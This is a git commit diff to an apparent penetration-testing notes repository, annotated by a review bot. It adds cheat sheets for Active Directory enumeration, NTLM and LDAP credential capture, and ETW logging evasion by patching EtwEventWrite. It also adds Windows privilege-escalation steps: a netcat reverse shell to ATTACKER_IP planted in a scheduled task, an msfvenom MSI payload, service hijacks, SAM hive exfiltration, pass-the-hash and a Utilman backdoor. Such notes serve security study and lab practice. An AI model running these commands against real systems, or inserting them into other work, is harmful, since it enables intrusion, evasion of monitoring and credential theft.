Stefan Friese 2022-06-20 00:09:28 +02:00
parent 4427517c17
commit c613e1d12d
9 changed files with 507 additions and 4870 deletions

3
.gitmodules vendored

@ -178,3 +178,6 @@
[submodule "hashes/namely"]
path = hashes/namely
url = https://github.com/OrielOrielOriel/namely
[submodule "misc/level3_hypervisor/kubeletctl"]
path = misc/level3_hypervisor/kubeletctl
url = https://github.com/cyberark/kubeletctl.git
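
Review bot: The new `misc/level3_hypervisor/kubeletctl` entry writes its `url` with a trailing `.git`, while the `hashes/namely` entry directly above it does not. Pick one form for all submodule URLs so the file stays easy to grep and diff.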

@ -0,0 +1,117 @@
# Enumerate Active Directory
Enumeration following after initial credentials are gained
## SYSVOL
* On windows use `runas` and gain local administrative permissions via
```sh
runas.exe /netonly /user:%FQDNORNETBIOSDOMAIN%\%USERNAME% cmd.exe
```
* Check validity of credentials against `SYSVOL`, it stores __Group Policy Objects (GPO)__. Every AD account will gain access
* Query DNS, for example the DC
```sh
$dnsip = "<DC IPaddress>"
$index = Get-NetAdapter -Name '<Ethernet>' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
```
* Check `SYSVOL` afterwards via `hostname` to verify via Kerberos auth
```sh
dir \\%HOSTNAME%\SYSVOL\
```
* Check `SYSVOL` via `IP` address to force `NTLM` authentication
## Microsoft Management Console (MMC)
* Use AD Snap-ins of `Remote Server Administrative Tools`
* Start -> Apps & Features -> Manage Optional Features -> Add a feature -> Search `RSAT` -> Select `RSAT: Active Directory Domain Services and Lightweight Directory Tools` -> Install
* `Win` + `r` -> `MMC` -> File -> Add/Remove Snap-in -> add 3 AD feature snap-ins -> right click `Active Directory Sites and Services` -> `Change Forest` -> Add root domain -> right click `Active Directory Users and Computers` -> Change Domain -> enter root domain -> right click `Active Directory Users and Computers ` -> View -> Advanced Features
* Start enumerating via click on the domain object in the tree on the left
* Take a look at `People` directory -> right click on them to see properties
* Change or create user or change groups
* Also use `MMC` to enumerate
## CMD enumeration
Execute from domain joined machine
* Users
```sh
net user /domain
```
* Specific user
```sh
net user <username> /domain
```
* Groups
```sh
net group /domain
```
* Specific group
```sh
net group <groupname> /domain
```
* Password Policy via accounts
```sh
net accounts /domain
```
## Powershell Cmdlets
* User details via
```sh
Get-ADUser -Identity <username> -Server <fqdn/or/DCdomain> -Properties *
```
* Groups
```sh
Get-ADGroup -Identity Administrators -Server exampleDC.com -Properties *
```
* Group membership
```sh
Get-ADGroupMember -Identity Administrators -Server exampleDC.com
```
* Generic AD objects
```sh
Get-ADObject -Filter <filterstuff> -includeDeletedObjects -Server exampleDC.com
Get-ADObject -Filter 'badPwdCount -gt 0' -Server exampleDC.com
```
* Domains
```sh
Get-ADDomain -Server exampleDC.com
```
## Sharphound and Bloodhound
* [BloodHound documentation](https://bloodhound.readthedocs.io/en/latest/index.html#)
* Change to AD user via `runas.exe` and collect via one of the following
* Sharphound.ps1
* sharphound.exe
* Azurehound.ps1
* For example
```sh
Sharphound.exe --CollectionMethods <Default/Session/All> --Domain example.com --ExcludeDCs
```
* After some time collect the current sessions via
```sh
Sharphound.exe --CollectionMethods Session --Domain example.com --ExcludeDCs
```
* Start neo4j db
```sh
neo4j console start
```
* Start bloodhound
```sh
bloodhound --no-sandbox
```
* Drag and Drop the zip file from Sharphound
* Either search for AD objects and use `Analysis` to find an attack path through the info on the edges
* Shows exploitable accounts in the `Analysis` tab, for example kerberroastable accounts
## LDAP
## PowerView
## WMI
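
Review bot: The first SYSVOL bullet says `runas` is used to "gain local administrative permissions", but `runas.exe /netonly` does not do that: with `/netonly` the supplied credentials are used for network connections only and the local session keeps its current identity, which is also why the next bullet has to check them against `SYSVOL`. Reword the bullet accordingly. The bullet "Check `SYSVOL` via `IP` address to force `NTLM` authentication" has no command under it, unlike the hostname case above it. `neo4j console start` gives two subcommands at once; `neo4j console` (foreground) and `neo4j start` (background) are separate, so keep one. The cmd and PowerShell snippets are all fenced as `sh`, and the `## LDAP`, `## PowerView` and `## WMI` headings at the end are empty; fill them or leave them out until there is content.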

@ -0,0 +1,115 @@
# Active Directory - Gain Foothold
* Methods of aquiring the first set of credentials
## Aquire credentials
### OSINT
* Discover info about the target via
* Questions asked on Stack Overflow
* Credentials set in (github) repos
* Past breaches, [haveIbeenpwned](https://haveibeenpwned.com/), [DeHashed](https://www.dehashed.com/)
### Phishing
* Gain credentials via eMail
## NTLM Authenticated Services
* Windows Authentication on NetNTLM is a Challenge-Response protocol used to deliver a challenge and the result on behalf of a user -- through the application -- to the DC
* These may be exposed to the Internet. For example
* Mail exchange, OWA webmail
* RDP
* VPN endpoints
* Web applications using something like SSO via AD
* Use these applications to either brute force / spraying passwords to found IDs or to verify previously aquired IDs and their passwords
## LDAP Bind Credentials
* LDAP may be integrated into an AD Forest. An application may verify an LDAP account with the help of AD credentials at the DC.
* Third party programs may use LDAP like
* CUPS
* VPNs
* gitlab
### LDAP Pass-Back
* After gaining access to a device's config including LDAP parameters, reroute its IP to your own IP. This may be done via web UIs.
* Use an LDAP server to catch the credentials. Only PLAIN and LOGIN authentication must be allowed in order to gain the credentials.
* OpenLDAP
```sh
dpkg-reconfigure -p low slapd
```
* Skip reconfiguration -> No
* Insert DNS domain and organisation
* Provide password
* Select `MDB` as database
* No removal when db is purged
* Move old database when creating a new one
* Downgrade authentication via `*.ldif` file
```sh
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```
* Patch and reload ldap
```sh
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
```
* Check via
```sh
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
```
* Make pcap via tcdump
## Authentication Relay
* Communcating services inside the network verify authentication of each other
* Intercept NTLM hashes send for example via `SMB` auth, or do a MITM
* Use responder poisons requests gained from
* __Link-Local Multicast Name Resolution__ (LLMNR)
* __NetBIOS Name Server__ (NBT-NS), send before LLMNR
* __Web Proxy Auto-Discovery__ (WPAD), finds proxies for future HTTP connections
### Capture via responder
* Run responder on LAN via
```sh
sudo responder -I <interface>
```
* Use `hashcat` to crack the hashes
```sh
hashcat -m 5600 hash.txt rockyout.txt --force
```
### Relay via responder
* `SMB` signing must not be enforced, either on or off
* Done after some intial enumeration and to gain administrative accounts
## Microsoft Deployment Toolkit (MDT)
* Deploy and patch software remotely
* Used in conjuction with Microsoft's System Center Configuration Manager (SCCM)
### Preboot Execution Environment (PXE)
* [Read this](https://www.riskinsight-wavestone.com/en/2020/01/taking-over-windows-workstations-pxe-laps/)
* Load and install OS via network
* `MDT` provisions PXE boot images
* An IP gained via `DHCP` is the validation step, PXE will be delivered by `MDT`
* Retrieve/enumerate images via `TFTP`
* Create an admin account after OS installation
* Password scraping to recover AD creds used during OS installation
* Use `PowerPXE.ps1` to extract `*.bcd` files
## Configuration Files
* Configurations of services and applications as well as registry keys
* Use enumeration scripts like `winpeas.sh` or `seatbelt`
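
Review bot: Under `### Relay via responder`, "`SMB` signing must not be enforced, either on or off" reads as a contradiction; state the condition once, for example that signing may be enabled or disabled as long as it is not required. Several names in this file will be copied verbatim and are misspelled: `rockyout.txt` in the hashcat line, `tcdump` in the pcap bullet, and `winpeas.sh` in the last bullet (the winPEAS link added elsewhere in this commit is not a shell script). The `--force` on the hashcat line overrides hashcat's own warnings and should not be part of the default example. Prose typos to fix in the same pass: "aquiring", "Aquire", "aquired", "Communcating", "intial", "conjuction".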

@ -0,0 +1 @@
Subproject commit 63a7ba9787c53857b299a728744f4d120795bf20

@ -1,5 +1,7 @@
# Kubernetes
* Check [kubeletctl](https://github.com/cyberark/kubeletctl.git) as well
## Account Token
* Snatch an account token from inside a pod
* Use it via kubectl, watch out for authorizations and namespaces
@ -32,8 +34,8 @@ metadata:
name: attacking-pod
spec:
containers:
- image: <imageName>
name: host
- image: <image name in found containers section>
name: <name of image in found containers section>
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumeMounts:
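
Review bot: In the pod spec, `name:` under `containers:` is the name of the container, not of the image, so the new placeholder `<name of image in found containers section>` suggests a coupling that does not exist. A short placeholder such as `<container name>` (or keeping a fixed name as before) is clearer, and "found containers section" should name the heading it refers to, since it is not visible from this part of the file.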
@ -52,5 +54,5 @@ kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET
```
* Run an interactive session on the pod
```sh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 exec -it attacking-pod -- /bin/bassh
kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 exec -it attacking-pod -- /bin/bash
```

@ -0,0 +1,96 @@
# Evade Event Tracing (ETW)
* Event Logging
* Trace Logging
* Event IDs are used
* __Event Provider__ generate events
* Managed Object Format, enabled by a single trace session
* Windows Software Trace Preprocessor, Trace Message Format, enabled by a single trace session
* Manifest Based, up to 8 trace sessions
* TraceLogging, up to 8 trace sessions
* __Event Controller__ build and configure sessions for events
* __Event Consumer__ interpret events, parses sessions of selected providers
* XML data
## Log Evasion
* Deleting logs is tracked by an event ID as well . Do not do it!
* ID 1102, security audit logs cleared
* ID 104, log file cleared
* ID 1100, even service shut down
### Techniques
* Provider
* [PSEtwLogProvider modification](https://docs.microsoft.com/en-us/dotnet/standard/assembly/) from .Net assembly
* Set `m_enabled` to `$null` via powershell script
```sh
$logProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
$etwProvider = $logProvider.GetField('etwProvider','NonPublic,Static').GetValue($null)
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0);
```
* Group policy takeover
* Loaded in the same security context as the user
* GPO providers are script block logging and module logging
* Event IDs reported are `4103` (Logs command invocation) and `4104` (Logs script block execution)
* Administrative Templates -> Windows Components -> Windows PowerShell
* Log pipeline abuse
* `LogPipelineExecutionDetails` has to be set to false
* Type creation
* Controller
* Patching EtwEventWrite stored in `ntdll.dll` via return value modification
```sh
var ntdll = Win32.LoadLibrary("ntdll.dll");
var etwFunction = Win32.GetProcAddress(ntdll, "EtwEventWrite");
```
* Modify memory permissions
```c
uint oldProtect;
Win32.VirtualProtect(
etwFunction,
(UIntPtr)patch.Length,
0x40,
out oldProtect
);
```
* Copy via `Marshal.Copy`
```c
patch(new byte[] { 0xc2, 0x14, 0x00 });
Marshal.Copy(
patch,
0,
etwEventSend,
patch.Length
);
```
* Clean up
```c
VirtualProtect(etwFunction, 4, oldProtect, &oldOldProtect);
```
* Check patched instruction
```c
Win32.FlushInstructionCache(
etwFunction,
NULL
);
```
* Runtime Trace Tampering
* Consumer
* Log smashing
* Log tampering
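
Review bot: The bullet "Set `m_enabled` to `$null` via powershell script" does not match the snippet under it, where `$null` is only the argument to `GetValue` and the value written by `SetValue` is `0`; the text should say what the snippet does. In the Log Evasion list, "ID 1100, even service shut down" should read "event", and there is a stray space before the period in "as well . Do not do it!". The link labelled "PSEtwLogProvider modification" points at the general .NET assemblies documentation, so the label should describe that page. The snippets in this file are PowerShell and C# but are fenced as `sh` and `c`.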

@ -4,14 +4,18 @@
* [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
* [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
* [JAWS](https://github.com/411Hall/JAWS)
* [winpeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
* [privescheck](https://github.com/itm4n/PrivescCheck)
* [windows exploit suggester](https://github.com/bitsadmin/wesng)
## Account Types
* __Administrator__ local & domain
* __Standard__ local & domain
* __Guest__
* __System__
* __System__, local system, final escalation
* __Local Service__, got anonymous connections over network.
* __Network Service__, default service account, authentication via network
## Enumeration
### Users & Groups
@ -26,6 +30,7 @@ qwinsta
```
### Files
* [powershell](../../../../enumeration/windows/powershell.md)
### System
@ -57,10 +62,12 @@ wmic service list brief | findstr "Running"
* [itm4n](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
### Schedules Tasks
* `schtasks`
* `schtasks` and `schtasks /query /tn %TASK_NAME% /fo list /v`
* `Autoruns64.exe`
### MSI Elevated Installer
* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)
### Search for Credentials
@ -89,6 +96,21 @@ accesschk64 -wvu "file.exe"
* [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md)
* Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards.
#### accesschk64 for Services
```sh
accesschk64 -qlc "service.exe"
```
* If permission `SERVICE_ALL_ACCESS` is set it is configurable upload a reverse shell
```sh
icacls C:\Windows\Temp\shell.exe /grant Everyone:F
```
* Reconfigure and restart service
```sh
sc config TheService binPath= "C:\Path\to\shell.exe" obj= LocalSystem
sc stop TheService
sc start TheService
```
### Startup Application
* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`
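
Review bot: The new `accesschk64 for Services` section ends at `sc start TheService` with no restore step, although `icacls ... /grant Everyone:F` leaves a world-writable executable in `C:\Windows\Temp` and `sc config` leaves the service pointing at it. Add a line to record the original `binPath` and `obj` before the change and to revert both and delete the file afterwards. Two wording fixes in the same section: "If permission `SERVICE_ALL_ACCESS` is set it is configurable upload a reverse shell" needs to be split into two statements, and `accesschk64 -qlc "service.exe"` passes a file name where `-c` expects a service name.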
@ -100,3 +122,148 @@ set srvport 7777
set uripath pass
```
* Visit site on target
### Unattended Windows Installation
* Investigate the following paths to potentially find user credentials
```sh
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```
* Watch out for the `<Credentials>` tags
### Powershell History file
```sh
Get-Content %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```
### Internet Information Services (IIS)
* Default web server on windows
* Paths containing credentials are the following
```sh
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
```
### Putty
* Saved proxy password credentials may be found via
```sh
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "ProxyPassword" /s
```
### schtask and icacls
* Check `schtasks /query /tn %TASK_NAME% /fo list /v`
* Check script for scheduled tasks, `F` means full access
```sh
icacls <PathToScript>
```
* Put payload inside the script
```sh
echo "C:\tmp\nc.exe -e cmd.exe %ATTACKER_IP% 4711" > <PathToSript>
```
* Run the task
```sh
schtasks /run /tn <taskname>
```
### Always Installs Elevated
* These should be set
```sh
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
```
* Craft `*.msi` file with a payload
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o wizard.msi
```
* Upload and execute via
```sh
msiexec /quiet /qn /i C:\Windows\Temp\wizard.msi
```
### Service Misconfiguration
* Check services, watch out for `BINARY_PATH_NAME` and `SERVICE_START_NAME`
```sh
sc qc apphostsvc
```
* Check found permissions via
```sh
icacls <BINARY_PATH_NAME>
```
* If the service binary path is writeable move the payload to its path and grant permissions
```sh
icacls <Payload_Service.exe> /grant Everyone:F
```
```sh
sc stop <service>
sc start <service>
```
* Catch the reverse shell service
Others ways are:
* Discretionary Access Control (DACL) can be opened via right click on the service and go to properties
* All services are stored under `HKLM\SYSTEM\CurrentControlSet\Services\`
### Unquoted Service Path
* If `BINARY_PATH_NAME` spaces are escaped incorrectly. Its path will be resolved to every space from left to right. If there is a binary with a matching name inside the directory it will be started.
* A created directory at install time inherits the permissions from its parent. Check it via
```sh
icacls <directory>
```
* Use `service-exe` payload in msfvenom upload the payload and move it on the path with the a fitting parital name of the service path
* Set permissions
```sh
icacls C:\Path/to/service.exe /grant Everyone:F
```
### Permissions
* [priv2admin](https://github.com/gtworek/Priv2Admin)
* `whoami /priv`
#### SeBackup / Restore
* If `SeBackup / SeRestore` (rw on all files) is set an elevated `cmd.exe` may be opened
* Download `SAM` and `System` hashes
```sh
reg save hklm\system C:\Windows\Temp\system.hive
reg save hklm\sam C:\Windows\Temp\sam.hive
```
* Start smb server on attack machine
```sh
copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\
copy C:\Windows\Temp\system.hive \\ATTACKER_IP\
```
* Dump the hashes
```sh
secretsdump.py -sam sam.hive -system system.hive LOCAL
```
* Use pass the hash to login
```sh
psexec.py -hashes <hash> administrator@$TARGET_IP
```
#### SeTakeOwnership
* If `SeTakeOwnership` is set one can take ownership of every file or service.
```sh
takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant <user>:F
copy cmd.exe utilman.exe
```
* Log out, on the Login screen click on `Ease of Access`
#### SeImpersonate / SeAssignPrimaryToken
* Execute process as another user
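
Review bot: Under "Powershell History file", `Get-Content %userprofile%\...` mixes two shells: `Get-Content` is a PowerShell cmdlet and PowerShell does not expand `%userprofile%`, so the line should use `$Env:USERPROFILE`, or `type` with `%userprofile%` if it is meant for cmd.exe. "### schtask and icacls" repeats the `schtasks /query /tn %TASK_NAME% /fo list /v` line that this commit also adds under "Schedules Tasks", and "### Always Installs Elevated" overlaps with the linked `always_installed_elevated.md`; "These should be set" does not say which value the two `reg query` lines are expected to show. In the SeBackup part, "Start smb server on attack machine" is followed by `copy` commands whose target `\\ATTACKER_IP\` has no share name. The SeTakeOwnership step overwrites `Utilman.exe` with no backup or restore line, which should be added for any host that has to be handed back in its original state. Typos: `<PathToSript>`, "parital", "the a fitting", and the mixed separators in `C:\Path/to/service.exe`.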

@ -1,212 +0,0 @@
[
{
"exit_code": 0,
"node_version": "14.15.4",
"versioning": null,
"version": "1.0.0",
"unstable_restarts": 0,
"restart_time": 1,
"created_at": 1611502382040,
"axm_dynamic": {},
"axm_options": {
"error": true,
"heapdump": true,
"feature.profiler.heapsnapshot": false,
"feature.profiler.heapsampling": true,
"feature.profiler.cpu_js": true,
"latency": true,
"catchExceptions": true,
"profiling": true,
"metrics": {
"http": true,
"runtime": true,
"eventLoop": true,
"network": false,
"v8": true
},
"standalone": false,
"tracing": {
"outbound": false,
"enabled": false
},
"module_conf": {},
"apm": {
"version": "4.3.5",
"type": "node"
},
"module_name": "server",
"module_version": "4.5.1"
},
"axm_monitor": {
"Heap Size": {
"value": "13.46",
"type": "internal/v8/heap/total",
"unit": "MiB",
"historic": true
},
"Heap Usage": {
"value": 87.5,
"type": "internal/v8/heap/usage",
"unit": "%",
"historic": true
},
"Used Heap Size": {
"value": "11.78",
"type": "internal/v8/heap/used",
"unit": "MiB",
"historic": true
},
"Active requests": {
"value": 0,
"type": "internal/libuv/requests",
"historic": true
},
"Active handles": {
"value": 4,
"type": "internal/libuv/handles",
"historic": true
},
"Event Loop Latency": {
"value": "0.47",
"type": "internal/libuv/latency/p50",
"unit": "ms",
"historic": true
},
"Event Loop Latency p95": {
"value": "4.49",
"type": "internal/libuv/latency/p95",
"unit": "ms",
"historic": true
},
"HTTP Mean Latency": {
"value": 16,
"type": "internal/http/builtin/latency/p50",
"unit": "ms",
"historic": true
},
"HTTP P95 Latency": {
"value": 1421.6999999999985,
"type": "internal/http/builtin/latency/p95",
"unit": "ms",
"historic": true
},
"HTTP": {
"value": 0.17,
"type": "internal/http/builtin/reqs",
"unit": "req/min",
"historic": true
}
},
"axm_actions": [
{
"action_name": "km:heapdump",
"action_type": "internal",
"arity": 2
},
{
"action_name": "km:cpu:profiling:start",
"action_type": "internal",
"arity": 2
},
{
"action_name": "km:cpu:profiling:stop",
"action_type": "internal",
"arity": 1
},
{
"action_name": "km:heap:sampling:start",
"action_type": "internal",
"arity": 2
},
{
"action_name": "km:heap:sampling:stop",
"action_type": "internal",
"arity": 1
}
],
"pm_uptime": 1611502382185,
"status": "online",
"unique_id": "1ffec2ab-685a-4046-85de-afd3cd6008ea",
"PM2_HOME": "/home/www/.pm2",
"LS_COLORS": "rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:",
"LESSCLOSE": "/usr/bin/lesspipe %s %s",
"LANG": "en_US.UTF-8",
"DISPLAY": ":0",
"SUDO_GID": "1000",
"COLORTERM": "truecolor",
"USERNAME": "root",
"SUDO_COMMAND": "/bin/su",
"USER": "www",
"PWD": "/home/www/VulnNet-Node",
"HOME": "/home/www",
"SUDO_USER": "serv-manage",
"SUDO_UID": "1000",
"MAIL": "/var/mail/www",
"TERM": "xterm-256color",
"SHELL": "/bin/bash",
"SHLVL": "2",
"LANGUAGE": "en_US",
"LOGNAME": "www",
"XAUTHORITY": "/home/serv-manage/.Xauthority",
"PATH": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games",
"LESSOPEN": "| /usr/bin/lesspipe %s",
"_": "/usr/bin/pm2",
"OLDPWD": "/home/www",
"PM2_USAGE": "CLI",
"NODE_APP_INSTANCE": 0,
"vizion_running": false,
"km_link": false,
"pm_pid_path": "/home/www/.pm2/pids/server-0.pid",
"pm_err_log_path": "/home/www/.pm2/logs/server-error.log",
"pm_out_log_path": "/home/www/.pm2/logs/server-out.log",
"exec_mode": "fork_mode",
"exec_interpreter": "node",
"pm_cwd": "/home/www/VulnNet-Node",
"pm_exec_path": "/home/www/VulnNet-Node/server.js",
"node_args": [],
"name": "server",
"filter_env": [],
"namespace": "default",
"env": {
"unique_id": "1ffec2ab-685a-4046-85de-afd3cd6008ea",
"server": {},
"PM2_HOME": "/home/www/.pm2",
"LS_COLORS": "rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:",
"LESSCLOSE": "/usr/bin/lesspipe %s %s",
"LANG": "en_US.UTF-8",
"DISPLAY": ":0",
"SUDO_GID": "1000",
"COLORTERM": "truecolor",
"USERNAME": "root",
"SUDO_COMMAND": "/bin/su",
"USER": "www",
"PWD": "/home/www/VulnNet-Node",
"HOME": "/home/www",
"SUDO_USER": "serv-manage",
"SUDO_UID": "1000",
"MAIL": "/var/mail/www",
"TERM": "xterm-256color",
"SHELL": "/bin/bash",
"SHLVL": "2",
"LANGUAGE": "en_US",
"LOGNAME": "www",
"XAUTHORITY": "/home/serv-manage/.Xauthority",
"PATH": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games",
"LESSOPEN": "| /usr/bin/lesspipe %s",
"_": "/usr/bin/pm2",
"OLDPWD": "/home/www",
"PM2_USAGE": "CLI"
},
"merge_logs": true,
"vizion": true,
"autorestart": true,
"watch": false,
"instance_var": "NODE_APP_INSTANCE",
"pmx": true,
"automation": true,
"treekill": true,
"username": "www",
"windowsHide": true,
"kill_retry_time": 100
}
]
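
Review bot: The file removed here is a pm2 process dump that embeds the whole process environment (`SUDO_USER`, `XAUTHORITY`, home and log paths, `unique_id`), and deleting it in this commit only removes it from the current tree; it stays retrievable from earlier commits. If it was committed by mistake, that needs a history rewrite rather than a deletion, and a `.gitignore` entry for such dumps would keep the next one out.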

File diff suppressed because one or more lines are too long